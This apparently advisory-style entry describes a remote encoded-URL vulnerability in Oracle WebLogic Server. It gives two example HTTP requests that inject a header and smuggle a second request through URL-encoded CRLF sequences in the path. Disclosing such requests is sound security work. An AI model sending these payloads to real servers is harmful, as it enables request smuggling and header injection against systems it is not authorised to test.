Oracle WebLogic Server Encoded URL Remote Vulnerability

Oracle WebLogic Server Encoded URL Remote Vulnerability

Attackers can exploit this issue using readily available tools.

The following example requests are available:

GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close

GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
Host: vulnerable.example.com